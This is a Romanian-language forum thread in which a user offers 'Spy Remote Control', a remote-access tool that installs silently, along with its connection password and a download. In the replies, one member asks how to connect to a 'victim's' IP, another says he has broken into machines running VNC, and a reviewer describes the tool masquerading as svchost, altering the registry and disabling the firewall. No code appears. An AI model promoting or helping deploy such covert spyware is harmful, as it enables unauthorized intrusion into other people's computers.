Jump to content
c0smyn

Spy Remote Control

Recommended Posts

Posted

Nume: Spy Remote Control

Versiune: 1.0 beta

Autor: c0smyn

Imagine:

srcts3.png

parola conectare:

cosmynno1

DOWNLOAD:

CLICK [dupa ce ati intrat in spy remote control.exe , acesta se va instala fara ca voi sa vedeti, icoana va aparea pe desktop] Enjoy

Astept pareri , sugestii ;)

Posted (edited)

are virus ? scanatil pls cu nod 32 sau pe virus total ;)

Edit:Deci am luat programul am scanat si scriu ipul victemei si imi scrie conectare nu se poate realiza ma ajuta cineva?

Edited by MARIUS123
Posted

marius nici un program de aici nu are virus(Asa cred..) antivirusu arata ca e virus pentru ca e hack dar nu ti se intampla nimica la calc

Posted

daca are net prin lan..cum sta treaba?:) am spart anumite pc-uri cu VNC pe ele..si aveau ip 192.168.*.* la retea, insa ma conectam la ele pe ip lor de extern. Era routat ip de la server sau..cum?:D

Posted

interesant programel..cateva observatii:

am testat direct serverul,foarte misto icon-ul,dar la mine cel putin cere voie la firewall..si cand vezi publisher "unknown" la svchost e tare suspect :)...si daca ai fii batut in cap dupa ce rulezi un exe imdediat dupa sa apara faza asta...foarte suspecta.

2.daca ai un active registry scanner such as spyboot,iara dai chix :)...te intreaba de 10000 de ori daca ii dai voie sa-ti miste in registri...si sunt tot felu de registrii t dubiosi.

3.install-ul pentru client mie cel putin mi-a dat vreo 6-7 errori :)...nu m-am chinuit sa o iau pe fiecare in parte ca nu are rost.

partea care m-a distrat enorm de mult :) dupa un restart firewall-ul era dezactivat,m-a distrat faza,dar foarte suspect.

daca tu l-ai compilat iti sugerz sa ii mai faci mici imbunatatiri ...

tot respectu,

maka

Guest
This topic is now closed to further replies.

• Create New...